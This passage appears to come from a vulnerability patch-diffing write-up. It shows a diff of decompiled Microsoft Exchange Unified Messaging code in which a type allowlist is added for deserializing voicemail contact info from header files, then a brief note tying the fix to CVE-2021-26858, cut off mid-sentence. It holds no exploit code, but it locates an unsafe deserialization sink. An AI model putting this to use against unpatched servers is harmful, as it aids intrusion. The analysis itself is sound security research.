+\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SentTime\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SentTime\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tDateTime dateTime = Convert.ToDateTime(array[1], CultureInfo.InvariantCulture);\n \t\t\t\t\t\t\t\t\texDateTime = new ExDateTime(ExTimeZone.CurrentTimeZone, dateTime);\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 2593661420U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 1526417836U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 978885386U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 1526417836U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 1526417836U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"MessageType\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\ttext = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"MessageType\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\ttext = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerAddress\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerAddress\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerAddress = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 1850847732U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 2593661420U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 2593661420U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.CallId = array[1];\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"CallerIdDisplayName\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerIdDisplayName\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tsubmissionHelper.CallerIdDisplayName = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 <= 3342616108U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 != 2975106116U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 3342616108U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 3342616108U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"TenantGuid\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"TenantGuid\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tsubmissionHelper.TenantGuid = new Guid(array[1]);\n +\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\telse if (text4 == \"SenderAddress\")\n +\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"SenderAddress\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\tstring text5 = array[1];\n \t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t\telse if (num2 != 3581765001U)\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\tif (num2 == 4186841001U)\n +\t\t\t\t\t\t\t\tif (num2 != 4186841001U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (text4 == \"CultureInfo\")\n -\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tif (!(text4 == \"CultureInfo\"))\n +\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\tsubmissionHelper.CultureInfo = array[1];\n +\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\telse if (text4 == \"MessageID\")\n +\t\t\t\t\t\t\telse if (!(text4 == \"MessageID\"))\n \t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\ttext2 = array[1];\n -\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\ttext2 = array[1];\n +\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\tIL_409:\n \t\t\t\t\t\t\tsubmissionHelper.CustomHeaders[array[0]] = array[1];\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text);\n \t\t\t\tif (num2 <= 894870128U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 <= 360985808U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 356120169U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 360985808U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"Fax\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new FaxPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"IncomingCallLog\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new IncomingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (num2 != 438908515U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 != 466919760U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (num2 == 894870128U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (text == \"CDR\")\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = CDRPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"CDRData\"]);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t\telse if (text == \"MissedCall\")\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"OCSNotification\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = OCSPipelineContext.Deserialize((string)submissionHelper.CustomHeaders[\"OCSNotificationData\"]);\n \t\t\t\t\t\ttext2 = pipelineContext.messageID;\n \t\t\t\t\t\texDateTime = pipelineContext.sentTime;\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 <= 1086454342U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 995233564U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 1086454342U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"XSOVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tpipelineContext = new XSOVoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"PartnerTranscriptionRequest\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new PartnerTranscriptionRequestPipelineContext(submissionHelper);\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (num2 != 1356218075U)\n \t\t\t\t{\n \t\t\t\t\tif (num2 != 2525024257U)\n \t\t\t\t\t{\n \t\t\t\t\t\tif (num2 == 3974407582U)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tif (text == \"SMTPVoiceMail\")\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num < PipelineWorkItem.ProcessedCountMax - 1)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tpipelineContext = new VoiceMessagePipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\tpipelineContext = new MissedCallPipelineContext(submissionHelper);\n -\t\t\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t\t\t}\n \t\t\t\t\t\t}\n \t\t\t\t\t}\n \t\t\t\t\telse if (text == \"HealthCheck\")\n \t\t\t\t\t{\n \t\t\t\t\t\tpipelineContext = new HealthCheckPipelineContext(Path.GetFileNameWithoutExtension(headerFile));\n -\t\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\t\tgoto IL_694;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\telse if (text == \"OutgoingCallLog\")\n \t\t\t\t{\n \t\t\t\t\tpipelineContext = new OutgoingCallLogPipelineContext(submissionHelper);\n -\t\t\t\t\tgoto IL_62E;\n +\t\t\t\t\tgoto IL_694;\n \t\t\t\t}\n \t\t\t\tthrow new HeaderFileArgumentInvalidException(string.Format(CultureInfo.InvariantCulture, \"{0}: {1}\", \"MessageType\", text));\n -\t\t\t\tIL_62E:\n +\t\t\t\tIL_694:\n \t\t\t\tif (text2 == null)\n \t\t\t\t{\n \t\t\t\t\ttext2 = Guid.NewGuid().ToString();\n \t\t\t\t\texDateTime = ExDateTime.Now;\n \t\t\t\t}\n \t\t\t\tpipelineContext.HeaderFileName = headerFile;\n \t\t\t\tpipelineContext.processedCount = num;\n \t\t\t\tif (contactInfo != null)\n \t\t\t\t{\n \t\t\t\t\tIUMResolveCaller iumresolveCaller = pipelineContext as IUMResolveCaller;\n \t\t\t\t\tif (iumresolveCaller != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tiumresolveCaller.ContactInfo = contactInfo;\n \t\t\t\t\t}\n \t\t\t\t}\n \t\t\t\tpipelineContext.sentTime = exDateTime;\n \t\t\t\tpipelineContext.messageID = text2;\n \t\t\t\tpipelineContext.WriteHeaderFile(headerFile);\n \t\t\t\tresult = pipelineContext;\n \t\t\t}\n -\t\t\tcatch (IOException ex)\n +\t\t\tcatch (IOException ex2)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to parse the header file {0} because its not closed by thread creating the file. Error={1}\", new object[]\n \t\t\t\t{\n \t\t\t\t\theaderFile,\n -\t\t\t\t\tex\n +\t\t\t\t\tex2\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tresult = null;\n \t\t\t}\n -\t\t\tcatch (InvalidObjectGuidException ex2)\n +\t\t\tcatch (InvalidObjectGuidException ex3)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn't find the recipient for this message. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex2\n +\t\t\t\t\tex3\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n -\t\t\tcatch (InvalidTenantGuidException ex3)\n +\t\t\tcatch (InvalidTenantGuidException ex4)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Couldn't find the tenant for this message. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex3\n +\t\t\t\t\tex4\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n -\t\t\tcatch (NonUniqueRecipientException ex4)\n +\t\t\tcatch (NonUniqueRecipientException ex5)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceWarning(ExTraceGlobals.VoiceMailTracer, 0, \"Multiple objects found for the recipient. Error={0}\", new object[]\n \t\t\t\t{\n -\t\t\t\t\tex4\n +\t\t\t\t\tex5\n \t\t\t\t});\n \t\t\t\tif (pipelineContext != null)\n \t\t\t\t{\n \t\t\t\t\tpipelineContext.Dispose();\n \t\t\t\t\tpipelineContext = null;\n \t\t\t\t}\n \t\t\t\tthrow;\n \t\t\t}\n \t\t\treturn result;\n \t\t}\n \n \t\tinternal abstract void WriteCustomHeaderFields(StreamWriter headerStream);\n \n \t\tpublic abstract string GetMailboxServerId();\n \n \t\tpublic abstract string GetRecipientIdForThrottling();\n \n \t\tinternal virtual void SaveMessage()\n \t\t{\n \t\t\tthis.WriteHeaderFile(this.HeaderFileName);\n \t\t}\n \n \t\tprotected override void InternalDispose(bool disposing)\n \t\t{\n \t\t\tif (disposing)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext.Dispose() called\", Array.Empty<object>());\n \t\t\t}\n \t\t}\n \n \t\tprotected override DisposeTracker InternalGetDisposeTracker()\n \t\t{\n \t\t\treturn DisposeTracker.Get<PipelineContext>(this);\n \t\t}\n \n \t\tprotected virtual void SetMessageProperties()\n \t\t{\n \t\t\tIUMResolveCaller iumresolveCaller = this as IUMResolveCaller;\n \t\t\tif (iumresolveCaller != null)\n \t\t\t{\n \t\t\t\tExAssert.RetailAssert(iumresolveCaller.ContactInfo != null, \"ResolveCallerStage should always set the ContactInfo.\");\n \t\t\t\tUMSubscriber umsubscriber = ((IUMCAMessage)this).CAMessageRecipient as UMSubscriber;\n \t\t\t\tUMDialPlan dialPlan = (umsubscriber != null) ? umsubscriber.DialPlan : null;\n \t\t\t\tMicrosoft.Exchange.UM.UMCommon.PhoneNumber pstnCallbackTelephoneNumber = this.CallerId.GetPstnCallbackTelephoneNumber(iumresolveCaller.ContactInfo, dialPlan);\n \t\t\t\tthis.messageToSubmit.From = iumresolveCaller.ContactInfo.CreateParticipant(pstnCallbackTelephoneNumber, this.CultureInfo);\n \t\t\t\tXsoUtil.SetVoiceMessageSenderProperties(this.messageToSubmit, iumresolveCaller.ContactInfo, dialPlan, this.CallerId);\n \t\t\t\tthis.messageToSubmit.InternetMessageId = BoomerangHelper.FormatInternetMessageId(this.MessageID, Utils.GetHostFqdn());\n \t\t\t\tthis.messageToSubmit[ItemSchema.SentTime] = this.SentTime;\n \t\t\t}\n \t\t\tthis.messageToSubmit.AutoResponseSuppress = AutoResponseSuppress.All;\n \t\t\tthis.messageToSubmit[MessageItemSchema.CallId] = this.helper.CallId;\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tthis.MessageToSubmit.Recipients.Add(new Participant(iumcamessage.CAMessageRecipient.ADRecipient));\n \t\t\t\tIADSystemConfigurationLookup iadsystemConfigurationLookup = ADSystemConfigurationLookupFactory.CreateFromOrganizationId(iumcamessage.CAMessageRecipient.ADRecipient.OrganizationId);\n \t\t\t\tthis.MessageToSubmit.Sender = new Participant(iadsystemConfigurationLookup.GetMicrosoftExchangeRecipient());\n \t\t\t}\n \t\t}\n \n \t\tprotected void WriteHeaderFile(string headerFileName)\n \t\t{\n \t\t\tusing (FileStream fileStream = File.Open(headerFileName, FileMode.Create, FileAccess.Write, FileShare.None))\n \t\t\t{\n \t\t\t\tusing (StreamWriter streamWriter = new StreamWriter(fileStream))\n \t\t\t\t{\n \t\t\t\t\tif (this.MessageType != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"MessageType : \" + this.MessageType);\n \t\t\t\t\t}\n \t\t\t\t\tstreamWriter.WriteLine(\"ProcessedCount : \" + this.processedCount.ToString(CultureInfo.InvariantCulture));\n \t\t\t\t\tif (this.messageID != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"MessageID : \" + this.messageID);\n \t\t\t\t\t}\n \t\t\t\t\tif (this.sentTime.Year != 1)\n \t\t\t\t\t{\n \t\t\t\t\t\tstreamWriter.WriteLine(\"SentTime : \" + this.sentTime.ToString(CultureInfo.InvariantCulture));\n \t\t\t\t\t}\n \t\t\t\t\tthis.WriteCommonHeaderFields(streamWriter);\n \t\t\t\t\tthis.WriteCustomHeaderFields(streamWriter);\n \t\t\t\t}\n \t\t\t}\n \t\t}\n \n \t\tprotected virtual void WriteCommonHeaderFields(StreamWriter headerStream)\n \t\t{\n \t\t\tif (!this.CallerId.IsEmpty)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerId : \" + this.CallerId.ToDial);\n \t\t\t}\n \t\t\tif (this.helper.RecipientName != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"RecipientName : \" + this.helper.RecipientName);\n \t\t\t}\n \t\t\tif (this.helper.RecipientObjectGuid != Guid.Empty)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"RecipientObjectGuid : \" + this.helper.RecipientObjectGuid.ToString());\n \t\t\t}\n \t\t\tif (this.helper.CallerName != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerNAme : \" + this.helper.CallerName);\n \t\t\t}\n \t\t\tif (!string.IsNullOrEmpty(this.helper.CallerIdDisplayName))\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerIdDisplayName : \" + this.helper.CallerIdDisplayName);\n \t\t\t}\n \t\t\tif (this.CallerAddress != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallerAddress : \" + this.CallerAddress);\n \t\t\t}\n \t\t\tif (this.helper.CultureInfo != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CultureInfo : \" + this.helper.CultureInfo);\n \t\t\t}\n \t\t\tif (this.helper.CallId != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"CallId : \" + this.helper.CallId);\n \t\t\t}\n \t\t\tIUMResolveCaller iumresolveCaller = this as IUMResolveCaller;\n \t\t\tif (iumresolveCaller != null && iumresolveCaller.ContactInfo != null)\n \t\t\t{\n \t\t\t\theaderStream.WriteLine(\"ContactInfo : \" + CommonUtil.Base64Serialize(iumresolveCaller.ContactInfo));\n \t\t\t}\n \t\t\theaderStream.WriteLine(\"TenantGuid : \" + this.helper.TenantGuid.ToString());\n \t\t}\n \n \t\tprotected UMRecipient CreateRecipientFromObjectGuid(Guid objectGuid, Guid tenantGuid)\n \t\t{\n \t\t\treturn UMRecipient.Factory.FromADRecipient<UMRecipient>(this.CreateADRecipientFromObjectGuid(objectGuid, tenantGuid));\n \t\t}\n \n \t\tprotected ADRecipient CreateADRecipientFromObjectGuid(Guid objectGuid, Guid tenantGuid)\n \t\t{\n \t\t\tif (objectGuid == Guid.Empty)\n \t\t\t{\n \t\t\t\tthrow new HeaderFileArgumentInvalidException(\"ObjectGuid is empty\");\n \t\t\t}\n \t\t\tADRecipient adrecipient = ADRecipientLookupFactory.CreateFromTenantGuid(tenantGuid).LookupByObjectId(new ADObjectId(objectGuid));\n \t\t\tif (adrecipient == null)\n \t\t\t{\n \t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Could not find recipient {0}\", new object[]\n \t\t\t\t{\n \t\t\t\t\tobjectGuid.ToString()\n \t\t\t\t});\n \t\t\t\tthrow new InvalidObjectGuidException(objectGuid.ToString());\n \t\t\t}\n \t\t\treturn adrecipient;\n \t\t}\n \n \t\tprotected UMDialPlan InitializeCallerIdAndTryGetDialPlan(UMRecipient recipient)\n \t\t{\n \t\t\tUMDialPlan umdialPlan = null;\n \t\t\tif (this.CallerId.UriType == UMUriType.E164 && recipient.ADRecipient.UMRecipientDialPlanId != null)\n \t\t\t{\n \t\t\t\tumdialPlan = ADSystemConfigurationLookupFactory.CreateFromADRecipient(recipient.ADRecipient).GetDialPlanFromId(recipient.ADRecipient.UMRecipientDialPlanId);\n \t\t\t\tif (umdialPlan != null && umdialPlan.CountryOrRegionCode != null)\n \t\t\t\t{\n \t\t\t\t\tthis.helper.CallerId = this.helper.CallerId.Clone(umdialPlan);\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn umdialPlan;\n \t\t}\n \n \t\tprotected string GetMailboxServerIdHelper()\n \t\t{\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tUMMailboxRecipient ummailboxRecipient = iumcamessage.CAMessageRecipient as UMMailboxRecipient;\n \t\t\t\tif (ummailboxRecipient != null)\n \t\t\t\t{\n \t\t\t\t\treturn ummailboxRecipient.ADUser.ServerLegacyDN;\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn \"af360a7e-e6d4-494a-ac69-6ae14896d16b\";\n \t\t}\n \n \t\tprotected string GetRecipientIdHelper()\n \t\t{\n \t\t\tIUMCAMessage iumcamessage = this as IUMCAMessage;\n \t\t\tif (iumcamessage != null)\n \t\t\t{\n \t\t\t\tUMMailboxRecipient ummailboxRecipient = iumcamessage.CAMessageRecipient as UMMailboxRecipient;\n \t\t\t\tif (ummailboxRecipient != null)\n \t\t\t\t{\n \t\t\t\t\treturn ummailboxRecipient.ADUser.DistinguishedName;\n \t\t\t\t}\n \t\t\t}\n \t\t\treturn \"455e5330-ce1f-48d1-b6b1-2e318d2ff2c4\";\n \t\t}\n \n \t\tprivate MessageItem messageToSubmit;\n \n \t\tprivate SubmissionHelper helper;\n \n \t\tprivate string messageType;\n \n \t\tprivate CultureInfo cultureInfo;\n \n \t\tprivate string headerFileName;\n \n \t\tprivate int processedCount;\n \n \t\tprivate string messageID;\n \n \t\tprivate ExDateTime sentTime;\n +\n +\t\tprivate static Type[] contactInfoDeserializationAllowList = new Type[]\n +\t\t{\n +\t\t\ttypeof(Version),\n +\t\t\ttypeof(Guid),\n +\t\t\ttypeof(PropTag),\n +\t\t\ttypeof(ContactInfo),\n +\t\t\ttypeof(ADContactInfo),\n +\t\t\ttypeof(FoundByType),\n +\t\t\ttypeof(ADUser),\n +\t\t\ttypeof(ADPropertyBag),\n +\t\t\ttypeof(ValidationError),\n +\t\t\ttypeof(ADPropertyDefinition),\n +\t\t\ttypeof(ADObjectId),\n +\t\t\ttypeof(ExchangeObjectVersion),\n +\t\t\ttypeof(ExchangeBuild),\n +\t\t\ttypeof(MultiValuedProperty<string>),\n +\t\t\ttypeof(LocalizedString),\n +\t\t\ttypeof(ProxyAddressCollection),\n +\t\t\ttypeof(SmtpAddress),\n +\t\t\ttypeof(RecipientDisplayType),\n +\t\t\ttypeof(RecipientTypeDetails),\n +\t\t\ttypeof(ElcMailboxFlags),\n +\t\t\ttypeof(UserAccountControlFlags),\n +\t\t\ttypeof(ObjectState),\n +\t\t\ttypeof(DirectoryBackendType),\n +\t\t\ttypeof(MServPropertyDefinition),\n +\t\t\ttypeof(MbxPropertyDefinition),\n +\t\t\ttypeof(MbxPropertyDefinitionFlags),\n +\t\t\ttypeof(OrganizationId),\n +\t\t\ttypeof(PartitionId),\n +\t\t\ttypeof(SmtpProxyAddress),\n +\t\t\ttypeof(SmtpProxyAddressPrefix),\n +\t\t\ttypeof(ByteQuantifiedSize),\n +\t\t\ttypeof(Unlimited<ByteQuantifiedSize>),\n +\t\t\ttypeof(List<ValidationError>),\n +\t\t\ttypeof(ADMultiValuedProperty<TextMessagingStateBase>),\n +\t\t\ttypeof(ADMultiValuedProperty<ADObjectId>),\n +\t\t\ttypeof(StoreObjectId),\n +\t\t\ttypeof(StoreObjectType),\n +\t\t\ttypeof(EntryIdProvider),\n +\t\t\ttypeof(SimpleContactInfoBase),\n +\t\t\ttypeof(MultipleResolvedContactInfo),\n +\t\t\ttypeof(CallerNameDisplayContactInfo),\n +\t\t\ttypeof(PersonalContactInfo),\n +\t\t\ttypeof(DefaultContactInfo),\n +\t\t\ttypeof(UMDialPlan),\n +\t\t\ttypeof(UMEnabledFlags),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+QuantifierProvider, Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"System.UnitySerializationHolder, mscorlib\"),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.ByteQuantifiedSize+Quantifier,Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"Microsoft.Exchange.Data.PropertyBag+ValuePair, Microsoft.Exchange.Data\"),\n +\t\t\tType.GetType(\"System.Collections.Generic.List`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\"),\n +\t\t\ttypeof(DialByNamePrimaryEnum),\n +\t\t\ttypeof(DialByNameSecondaryEnum),\n +\t\t\ttypeof(AudioCodecEnum),\n +\t\t\ttypeof(UMUriType),\n +\t\t\ttypeof(UMSubscriberType),\n +\t\t\ttypeof(UMGlobalCallRoutingScheme),\n +\t\t\ttypeof(UMVoIPSecurityType),\n +\t\t\ttypeof(SystemFlagsEnum),\n +\t\t\ttypeof(EumProxyAddress),\n +\t\t\ttypeof(EumProxyAddressPrefix)\n +\t\t};\n \t}\n }\n \n\nThe patch appears to add and use a typed allowlist for deserialization of a voicemail\u2019s contact info, which is found in a header file alongside the voicemail itself. ~~Other seemingly unprotected deserializations can be seen in the same class.~~ (I think it\u2019s just XML parsing.) My suspicion is that [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) or 